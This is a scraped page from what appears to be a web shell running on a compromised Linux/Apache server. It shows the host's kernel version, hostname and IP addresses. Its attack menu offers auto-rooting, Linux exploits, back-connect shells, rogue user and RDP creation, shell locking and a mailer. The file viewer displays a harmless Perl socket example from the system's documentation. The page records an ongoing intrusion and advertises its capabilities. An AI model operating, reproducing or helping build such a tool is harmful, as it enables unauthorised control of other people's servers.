Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-IO-Socket-IP-0.21 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
connect.pl
987
B
-rw-r--r--
nonblocking_libasyncns.pl
1.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : connect.pl
#!/usr/bin/perl use strict; use warnings; use IO::Poll; use IO::Socket::IP; use Socket qw( SOCK_STREAM ); my $host = shift @ARGV or die "Need HOST\n"; my $service = shift @ARGV or die "Need SERVICE\n"; my $socket = IO::Socket::IP->new( PeerHost => $host, PeerService => $service, Type => SOCK_STREAM, ) or die "Cannot connect to $host:$service - $@"; printf STDERR "Connected to %s:%s\n", $socket->peerhost_service; my $poll = IO::Poll->new; $poll->mask( \*STDIN => POLLIN ); $poll->mask( $socket => POLLIN ); while(1) { $poll->poll( undef ); if( $poll->events( \*STDIN ) ) { my $ret = STDIN->sysread( my $buffer, 8192 ); defined $ret or die "Cannot read STDIN - $!\n"; $ret or last; $socket->syswrite( $buffer ); } if( $poll->events( $socket ) ) { my $ret = $socket->sysread( my $buffer, 8192 ); defined $ret or die "Cannot read socket - $!\n"; $ret or last; STDOUT->syswrite( $buffer ); } }
Close